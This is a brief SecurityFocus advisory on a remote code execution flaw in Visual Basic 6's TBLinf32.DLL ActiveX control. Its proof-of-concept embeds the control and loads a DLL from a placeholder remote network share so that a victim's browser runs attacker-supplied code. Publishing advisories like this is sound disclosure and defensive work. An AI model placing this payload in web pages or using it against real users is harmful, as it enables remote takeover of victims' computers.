Microsoft Visual Basic 6 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability

An attacker may exploit this issue by enticing victims into opening a maliciously crafted web page.

The following proof-of-concept is available:

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)


 

Privacy Statement
Copyright 2010, SecurityFocus